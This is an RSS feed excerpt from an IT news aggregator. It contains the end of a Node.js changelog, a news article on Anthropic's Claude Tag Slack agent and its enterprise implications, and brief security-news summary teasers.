<li>[<a href="https://github.com/nodejs/node/commit/287e02303f"><code>287e02303f</code></a>] - <strong>src,sqlite</strong>: remove dead code (Edy Silva) <a href="https://github.com/nodejs/node/pull/63204" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63204/hovercard">#63204</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58fa2ee189"><code>58fa2ee189</code></a>] - <strong>stream</strong>: switch to internal <code>sleep</code> binding (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63611" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63611/hovercard">#63611</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f954ab3f1a"><code>f954ab3f1a</code></a>] - <strong>stream</strong>: use data listener for compose forwarding (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63593" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63593/hovercard">#63593</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dc57173003"><code>dc57173003</code></a>] - <strong>stream</strong>: fix Writable.toWeb() hang on synchronous drain (sangwook) <a href="https://github.com/nodejs/node/pull/61197" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/61197/hovercard">#61197</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cee279c5d6"><code>cee279c5d6</code></a>] - <strong>stream</strong>: remove unnecessary check (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63030" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63030/hovercard">#63030</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61b20f60a3"><code>61b20f60a3</code></a>] - <strong>test</strong>: update tls/crypto behaviour expectations when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a835363808"><code>a835363808</code></a>] - <strong>test</strong>: update WPT for WebCryptoAPI to 97bbc7247a (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63417" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63417/hovercard">#63417</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a00297480b"><code>a00297480b</code></a>] - <strong>test</strong>: update WPT resources, interfaces and WebCryptoAPI (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62389" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62389/hovercard">#62389</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5a95a2b055"><code>5a95a2b055</code></a>] - <strong>test</strong>: shorten path in net pipe connect errors (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63405" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63405/hovercard">#63405</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5e8ff22d8f"><code>5e8ff22d8f</code></a>] - <strong>test</strong>: remove test-node-output-v8-warning (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63469" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63469/hovercard">#63469</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ee15380950"><code>ee15380950</code></a>] - <strong>test</strong>: update test426-fixtures to 9b9e225b5a63139e9a95cdd1bf874a8f0b9d131 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63373" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63373/hovercard">#63373</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9e063d9bea"><code>9e063d9bea</code></a>] - <strong>test</strong>: update WPT for url to e4a4672e9e (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63372" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63372/hovercard">#63372</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/503bee4b43"><code>503bee4b43</code></a>] - <strong>test</strong>: deflake async-hooks statwatcher test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63396" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63396/hovercard">#63396</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cccc7c32d8"><code>cccc7c32d8</code></a>] - <strong>test</strong>: avoid test_runner watch restart in spec snapshot (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63392" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63392/hovercard">#63392</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c89489258c"><code>c89489258c</code></a>] - <strong>test</strong>: reduce watch mode restart flakiness (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63390" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63390/hovercard">#63390</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4d5e2578e"><code>e4d5e2578e</code></a>] - <strong>test</strong>: isolate rerun-failures state file under tmpdir (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63449" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63449/hovercard">#63449</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/362644a9ba"><code>362644a9ba</code></a>] - <strong>test</strong>: wait for ok before initial break after restart (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62807" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62807/hovercard">#62807</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c4058d0e05"><code>c4058d0e05</code></a>] - <strong>test</strong>: disable Maglev in near-heap-limit worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63398" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63398/hovercard">#63398</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/214da630a7"><code>214da630a7</code></a>] - <strong>test</strong>: deflake connection refused proxy tests (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63395" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63395/hovercard">#63395</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1d61a29876"><code>1d61a29876</code></a>] - <strong>test</strong>: avoid repeated writes in watch helper (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63386" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63386/hovercard">#63386</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2004e25387"><code>2004e25387</code></a>] - <strong>test</strong>: deflake watch mode worker test (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/63384" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63384/hovercard">#63384</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d691cccfc1"><code>d691cccfc1</code></a>] - <strong>test</strong>: relax test-memory-usage arrayBuffers check (inoway46) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0ff6bf853c"><code>0ff6bf853c</code></a>] - <strong>test</strong>: reduce flakiness of <code>different-registry-per-thread</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63244" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63244/hovercard">#63244</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d9f4e8e503"><code>d9f4e8e503</code></a>] - <strong>test</strong>: fix flaky test-watch-mode-inspect timeout (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63361" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63361/hovercard">#63361</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d7cd50328"><code>6d7cd50328</code></a>] - <strong>test</strong>: relax min assertion in test-performance-eventloopdelay (Marco) <a href="https://github.com/nodejs/node/pull/63100" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63100/hovercard">#63100</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9dafe1d2d8"><code>9dafe1d2d8</code></a>] - <strong>test</strong>: avoid flaky restart sync in debugger exceptions test (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62055" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62055/hovercard">#62055</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/989b2de973"><code>989b2de973</code></a>] - <strong>test</strong>: avoid initial-break wait in restart-message (inoway46) <a href="https://github.com/nodejs/node/pull/62060" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62060/hovercard">#62060</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a072a25ee7"><code>a072a25ee7</code></a>] - <strong>test</strong>: move FFI tests to <code>NATIVE_SUITES</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63165" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63165/hovercard">#63165</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/64efbfd878"><code>64efbfd878</code></a>] - <strong>test</strong>: use ERM to destroy sqlite database handles after tests (René) <a href="https://github.com/nodejs/node/pull/63076" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63076/hovercard">#63076</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7dee66cd94"><code>7dee66cd94</code></a>] - <strong>test_runner</strong>: dont buffer unordered events in process isolation mode (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63432" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63432/hovercard">#63432</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d257eec1e3"><code>d257eec1e3</code></a>] - <strong>test_runner</strong>: fix --test-rerun-failures swallowing failures on retry (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63431" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63431/hovercard">#63431</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/288c320e2f"><code>288c320e2f</code></a>] - <strong>test_runner</strong>: show replayed-from-attempt hint in spec reporter (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/904bdf5bb4"><code>904bdf5bb4</code></a>] - <strong>test_runner</strong>: preserve run duration when using test-rerun (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df183d7bfa"><code>df183d7bfa</code></a>] - <strong>test_runner</strong>: avoid hanging on incomplete v8 frames (Ali Hassan) <a href="https://github.com/nodejs/node/pull/62704" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62704/hovercard">#62704</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ec86c69726"><code>ec86c69726</code></a>] - <strong>test_runner</strong>: fix diagnostics channel context tracking (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63283" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63283/hovercard">#63283</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/94e5f63b83"><code>94e5f63b83</code></a>] - <strong>tls</strong>: add unsupported renegotiation error (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/06d308fb61"><code>06d308fb61</code></a>] - <strong>tools</strong>: prevent lib code from reading KeyObject and CryptoKey accessors (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2e4a0d0c91"><code>2e4a0d0c91</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.5 to 5.0.6 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63415" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63415/hovercard">#63415</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9666b366"><code>4c9666b366</code></a>] - <strong>tools</strong>: skip commit-lint on backport pull requests (Marco) <a href="https://github.com/nodejs/node/pull/63378" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63378/hovercard">#63378</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/67d0c490a8"><code>67d0c490a8</code></a>] - <strong>tools</strong>: fix skip of <code>test-internet</code> on forks (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63492" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63492/hovercard">#63492</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f73c7cac"><code>02f73c7cac</code></a>] - <strong>tools</strong>: bump the eslint group in /tools/eslint with 4 updates (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63075" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63075/hovercard">#63075</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5d016d3241"><code>5d016d3241</code></a>] - <strong>tools</strong>: update gyp-next to 0.22.2 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63374" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63374/hovercard">#63374</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/55af0f0edb"><code>55af0f0edb</code></a>] - <strong>tools</strong>: fix test426 updater (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63271" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63271/hovercard">#63271</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d8475e167a"><code>d8475e167a</code></a>] - <strong>tools</strong>: use different branch for tool updates on staging branches (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63110" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63110/hovercard">#63110</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c605df9e50"><code>c605df9e50</code></a>] - <strong>util</strong>: remove unused functions (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63612/hovercard">#63612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe4540ebdb"><code>fe4540ebdb</code></a>] - <strong>util</strong>: create hex style cache and fast path (Guilherme Araújo) <a href="https://github.com/nodejs/node/pull/62999" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62999/hovercard">#62999</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic launches Claude Tag, replacing its Slack app with a persistent AI teammate that learns, monitors and works autonomously]]></title>
<description><![CDATA[Anthropic on Tuesday launched Claude Tag, a new product that embeds its most advanced AI model directly inside Slack as a persistent, shared teammate that anyone on a team can delegate work to by simply typing @Claude.The product, available today in beta for Claude Enterprise and Team customers, ...]]></description>
<link>https://tsecurity.de/de/3619113/it-nachrichten/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619113/it-nachrichten/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously/</guid>
<pubDate>Tue, 23 Jun 2026 19:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a> on Tuesday launched <a href="http://anthropic.com/news/introducing-claude-tag"><u>Claude Tag</u></a>, a new product that embeds its most advanced AI model directly inside Slack as a persistent, shared teammate that anyone on a team can delegate work to by simply typing @Claude.</p><p>The product, available today in beta for<a href="https://support.claude.com/en/articles/9797531-what-is-the-enterprise-plan"> Claude Enterprise</a> and <a href="https://support.claude.com/en/articles/9266767-what-is-the-team-plan">Team</a> customers, replaces Anthropic's existing Claude in Slack app and represents the company's most aggressive move yet to colonize the enterprise collaboration layer — the place where decisions get made, work gets assigned, and institutional knowledge accumulates in real time.</p><p>For enterprise technology leaders who have spent the past two years evaluating where AI fits into their operational stack, <a href="https://venturebeat.com/technology/anthropic.com/news/introducing-claude-tag">Claude Tag</a> reframes the question entirely. This is not a chatbot, a coding assistant, or a search tool bolted onto a messaging platform. It is an AI agent designed to function as a standing member of a team — one that builds memory, takes initiative, works asynchronously, and interacts with every person in a channel rather than serving a single user. The implications for enterprise workflow, governance, and vendor strategy are significant.</p><p>Anthropic says 65% of its own product team's code is now created by its internal version of Claude Tag, and the company runs internal support and data insight channels through the same system. The claim is striking: Anthropic is asserting that the majority of its own product engineering output already flows through the tool it just put in customers' hands.</p><div></div><h2><b>How Claude Tag works inside enterprise Slack channels</b></h2><p>At its core, <a href="https://venturebeat.com/technology/anthropic.com/news/introducing-claude-tag">Claude Tag</a> works like this: an administrator pairs it with a Slack workspace, grants it access to specific tools and data sources, sets spending limits, and defines which channels it can operate in. From that point on, any team member in those channels can tag @Claude with a request — write a pull request, pull sales numbers, run a data analysis — and Claude will break the task into stages, execute them using the tools it has access to, and respond in a Slack thread with the result. The product runs on <a href="https://www.anthropic.com/news/claude-opus-4-8">Claude Opus 4.8</a>, the model Anthropic released less than a month ago.</p><p>Four capabilities differentiate <a href="https://www.anthropic.com/news/introducing-claude-tag">Claude Tag </a>from its predecessors and from competing integrations. First, it is multiplayer. Within a given Slack channel, there is one Claude that interacts with everyone, not a separate instance per user. Anyone can see what it is working on, and anyone can pick up the conversation where the last person left off. This is a direct contrast to most existing AI integrations in Slack, which tend to operate as single-player tools.</p><p>Second, it learns over time. As Claude follows along with its channel, it accumulates context about the work happening there. Users do not need to re-explain projects from scratch. If granted permission, Claude can also pull context from other Slack channels and data sources, though Anthropic says it will not report from private channels. Third, it takes initiative. With ambient behavior enabled, Claude will proactively surface relevant information from across the channels it monitors and the tools it is connected to, and will follow up on threads or tasks that have gone quiet without resolution. This is a notable expansion of agency: Claude is not just responding to requests but monitoring the information environment and deciding what its human teammates need to know. Fourth, it works asynchronously, pursuing projects autonomously over hours or days. Anthropic says its own teams "now spend much more of our time delegating tasks to many Claudes in parallel."</p><h2><b>Enterprise security controls and administrative governance get a central role</b></h2><p><a href="https://www.anthropic.com/">Anthropic</a> has designed the system with enterprise-grade isolation at its center. System administrators define separate Claude identities for different uses, scoped to specific channels with specific tools and data access. Everything, including Claude's accumulated memories, stays within those boundaries. A Claude configured for sales work will not share memories or data access with one configured for engineering.</p><p>Administrators can set token-spend limits at both the organizational and channel level, and can review a complete log of every action Claude has taken and which user requested each task. For organizations managing compliance, audit, or regulatory requirements, this logging and scoping architecture is table stakes — and its absence has been a dealbreaker for many enterprises evaluating AI collaboration tools over the past year.</p><p>Migration from the existing <a href="https://slack.com/marketplace/A08SF47R6P4-claude">Claude in Slack app</a> requires an administrator opt-in within 30 days, and Anthropic says it is issuing introductory launch credits to eligible Enterprise and Team organizations. The four-step setup process — pair with Slack, connect tools, set spend limits, test in a private channel — is designed to reduce friction for IT teams already managing sprawling SaaS portfolios.</p><h2><b>The Slack battleground is now the most contested real estate in enterprise AI</b></h2><p><a href="https://venturebeat.com/technology/anthropic.com/news/introducing-claude-tag">Claude Tag</a> arrives in the middle of what has become the most fiercely contested territory in enterprise AI: the Slack channel. Slack itself has been aggressively positioning the platform as an "agentic operating system," and the major AI players have responded by racing to plant their flags.</p><p>Salesforce, which <a href="https://slack.com/blog/news/salesforce-completes-acquisition-of-slack">acquired Slack for $27.7 billion in 2021</a>, announced more than <a href="https://venturebeat.com/orchestration/slack-adds-30-ai-features-to-slackbot-its-most-ambitious-update-since-the">30 new capabilities for Slackbot</a> in March — the most sweeping overhaul of the platform since the acquisition — transforming it from a simple conversational assistant into a full-spectrum enterprise agent. OpenAI introduced "<a href="https://openai.com/index/introducing-workspace-agents-in-chatgpt/">Workspace Agents</a>" in April, allowing enterprise subscribers to design agents that take on work tasks across third-party apps including Slack, Google Drive, Microsoft apps, Salesforce, and Notion. Perplexity launched its enterprise "Computer" agent with direct Slack integration, letting employees query @computer directly inside Slack channels. Cognition's Devin, the autonomous AI software engineer, has been built around Slack as a primary interface since its early days. Even Microsoft has brought GitHub Copilot into Teams.</p><p>The logic driving this convergence is straightforward: the average enterprise juggles over 1,000 applications, and employees waste countless hours on context switching, draining productivity by up to 40%. Whichever AI system becomes the default presence in the communication layer where work is coordinated gains an enormous distribution advantage — and, critically, an enormous data advantage. The AI that lives in the channel where work happens absorbs the institutional context that makes it increasingly difficult to replace.</p><h2><b>Anthropic built Claude Tag on a foundation two years in the making</b></h2><p>To understand Claude Tag's strategic significance, it helps to trace the product arc that led to it. Anthropic first integrated Claude with Slack in October 2025, offering two-way connectivity: users could invoke Claude from within Slack or connect Slack as a data source for Claude's chatbot. As TechCrunch reported at the time, the initial integration was focused on individual productivity — direct messages, AI assistant panels, and thread participation. In January 2026, Anthropic expanded Claude's Slack presence when it launched interactive Claude apps, which TechCrunch's Russell Brandom reported included workplace tools like Slack, Canva, Figma, Box, and Clay.</p><p>In parallel, Anthropic was building out its enterprise infrastructure stack. As TechCrunch reported in August 2025, the company bundled Claude Code into enterprise plans, a move its product lead Scott White called "the most requested feature from our business team and enterprise customers." In April 2026, Anthropic launched Claude Managed Agents, a suite of composable APIs for building and deploying cloud-hosted AI agents at scale, with early adopters including Notion, Rakuten, Asana, and Sentry. As The New Claw Times reported, the move positioned Anthropic "as a direct competitor to AWS Bedrock Agents and Google Vertex Agent Builder."</p><p>Then came Claude Opus 4.8 in late May, which Anthropic described as "a more effective collaborator" with "sharper judgement, more honesty about its progress, and the ability to work independently for longer than its predecessors." As 9to5Mac reported, benchmark improvements included a jump in agentic coding scores from 64.3% to 69.2% and a knowledge work score increase from 1753 to 1890. Claude Tag is the synthesis of all of these threads — combining the Slack channel presence, the enterprise security architecture, the Managed Agents infrastructure, and the Opus 4.8 model's improved agentic capabilities into a single product that Anthropic frames as "the beginning of an evolution of Claude Code."</p><h2><b>Anthropic's explosive growth explains why it is betting big on the collaboration layer</b></h2><p>The financial stakes behind this launch are enormous. Anthropic raised $65 billion in Series H funding in late May at a $965 billion post-money valuation, and its run-rate revenue crossed $47 billion earlier this month. Claude Code's run-rate revenue alone has grown to over $2.5 billion, more than doubling since the beginning of 2026, and enterprise use has grown to represent over half of all Claude Code revenue.</p><p>Those numbers explain why Anthropic is investing so heavily in channel-level presence. Every enterprise customer who grants Claude persistent access to a Slack channel — with connected tools, accumulated context, and ambient monitoring enabled — represents a dramatically deeper integration than a chatbot conversation or an API call. The usage patterns become stickier, the token consumption grows, and the switching costs rise. Deloitte's deployment of Claude across more than 470,000 employees in 150 countries — reportedly its largest-ever enterprise AI deployment — illustrates the scale at which these dynamics play out.</p><p>The broader market trajectory reinforces the bet. Fortune Business Insights projects the global agentic AI market will grow from $9.14 billion in 2026 to $139 billion by 2034, and Gartner forecasts that 40% of enterprise applications will feature task-specific AI agents by 2026, up from less than 5% in 2025. Anthropic is not alone in seeing this future, but with Claude Tag it is making one of the most direct plays yet to own the enterprise agent layer.</p><h2><b>The risks enterprise buyers need to weigh before granting Claude a permanent seat at the table</b></h2><p>Claude Tag raises several questions that enterprise buyers will need to evaluate carefully. The first is vendor dependency. As The New Stack noted when analyzing Claude Managed Agents earlier this year, once an organization's agents, operational configurations, and monitoring run on Anthropic's managed infrastructure, switching costs increase significantly. Claude Tag deepens this dynamic: a Claude that has accumulated months of channel context and institutional memory becomes very difficult to replace. Enterprise procurement teams accustomed to negotiating multi-cloud flexibility will need to think hard about what it means to give a single vendor's AI persistent access to the communication layer where institutional knowledge lives.</p><p>The second is governance around ambient monitoring. The proactive behavior mode — in which Claude monitors channels and surfaces information it decides is relevant — represents a meaningful expansion of what enterprise AI systems do. Organizations will need to develop clear frameworks for an AI agent that is not just responding to requests but actively surveilling information flows and making editorial judgments about what humans need to know. For regulated industries, this raises questions that existing AI governance policies may not yet address.</p><p>The third is pricing. Anthropic has not published detailed pricing for Claude Tag beyond noting that it runs on token-based spending with administrative controls. For an agent that monitors channels continuously, builds memory, and works asynchronously over hours or days, the token consumption profile could look very different from traditional AI usage. And the fourth is reliability: Anthropic has been candid in recent months about infrastructure strain caused by surging demand, and for a product positioned as an always-on team member, downtime carries a different kind of cost than it does for a tool invoked on demand.</p><h2><b>What Claude Tag signals about the future of enterprise work</b></h2><p>Anthropic says its goal is to expand Claude Tag beyond Slack "so that teams can tag @Claude in the many other places they work." The company is clearly eyeing the full collaboration surface — Microsoft Teams, email, project management tools, and beyond. If Claude Tag succeeds, it will validate a model of enterprise AI that looks less like a tool and more like a new category of worker: one that never sleeps, never forgets what was discussed in the channel last Tuesday, and never needs to be onboarded twice.</p><p>But the deeper significance of this launch may be what it reveals about the competitive dynamics reshaping enterprise software. For decades, the most valuable real estate in business technology was the system of record — the database, the CRM, the ERP. The current AI arms race suggests that the next era of enterprise value will be captured not by the system that stores the data, but by the agent that sits in the room where the work happens and understands what to do with it. Anthropic just gave that agent a name, a permanent seat in the channel, and permission to speak up when it thinks it has something to say. The question for every enterprise technology leader is no longer whether that agent will arrive. It is whether they are ready to manage it when it does.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Daily Summary 2026-06-22]]></title>
<description><![CDATA[168 posts were published in the last hour 21:32 : Rootkit Removal: A Step-by-Step Guide 21:32 : New Apple Exploit Exposes Millions of iPhones Worldwide, No Software Fix Available 21:32 : Builder Culture Is Driving New AI Security Challenges 21:32…
Read more →
The post IT Security News Daily Summa...]]></description>
<link>https://tsecurity.de/de/3616800/it-security-nachrichten/it-security-news-daily-summary-2026-06-22/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616800/it-security-nachrichten/it-security-news-daily-summary-2026-06-22/</guid>
<pubDate>Tue, 23 Jun 2026 00:07:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>168 posts were published in the last hour 21:32 : Rootkit Removal: A Step-by-Step Guide 21:32 : New Apple Exploit Exposes Millions of iPhones Worldwide, No Software Fix Available 21:32 : Builder Culture Is Driving New AI Security Challenges 21:32…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-06-22/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-06-22/">IT Security News Daily Summary 2026-06-22</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-23 00h : 9 posts]]></title>
<description><![CDATA[9 posts were published in the last hour 21:55 : IT Security News Daily Summary 2026-06-22 21:32 : Rootkit Removal: A Step-by-Step Guide 21:32 : New Apple Exploit Exposes Millions of iPhones Worldwide, No Software Fix Available 21:32 : Builder…
Read more →
The post IT Security News Hourly Summary ...]]></description>
<link>https://tsecurity.de/de/3616797/it-security-nachrichten/it-security-news-hourly-summary-2026-06-23-00h-9-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616797/it-security-nachrichten/it-security-news-hourly-summary-2026-06-23-00h-9-posts/</guid>
<pubDate>Tue, 23 Jun 2026 00:07:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>9 posts were published in the last hour 21:55 : IT Security News Daily Summary 2026-06-22 21:32 : Rootkit Removal: A Step-by-Step Guide 21:32 : New Apple Exploit Exposes Millions of iPhones Worldwide, No Software Fix Available 21:32 : Builder…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-23-00h-9-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-23-00h-9-posts/">IT Security News Hourly Summary 2026-06-23 00h : 9 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Builder Culture Is Driving New AI Security Challenges ]]></title>
<description><![CDATA[Vanta finds that builder roles are driving AI adoption and introducing new security risks.
The post Builder Culture Is Driving New AI Security Challenges  appeared first on eSecurity Planet.]]></description>
<link>https://tsecurity.de/de/3616716/it-security-nachrichten/builder-culture-is-driving-new-ai-security-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616716/it-security-nachrichten/builder-culture-is-driving-new-ai-security-challenges/</guid>
<pubDate>Mon, 22 Jun 2026 23:35:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Vanta finds that builder roles are driving AI adoption and introducing new security risks.</p>
<p>The post <a href="https://www.esecurityplanet.com/threats/builder-culture-is-driving-new-ai-security-challenges/">Builder Culture Is Driving New AI Security Challenges </a> appeared first on <a href="https://www.esecurityplanet.com/">eSecurity Planet</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Builder Culture Is Driving New AI Security Challenges]]></title>
<description><![CDATA[Vanta finds that builder roles are driving AI adoption and introducing new security risks. The post Builder Culture Is Driving New AI Security Challenges  appeared first on eSecurity Planet. This article has been indexed from eSecurity Planet Read the original…
Read more →
The post Builder Cultur...]]></description>
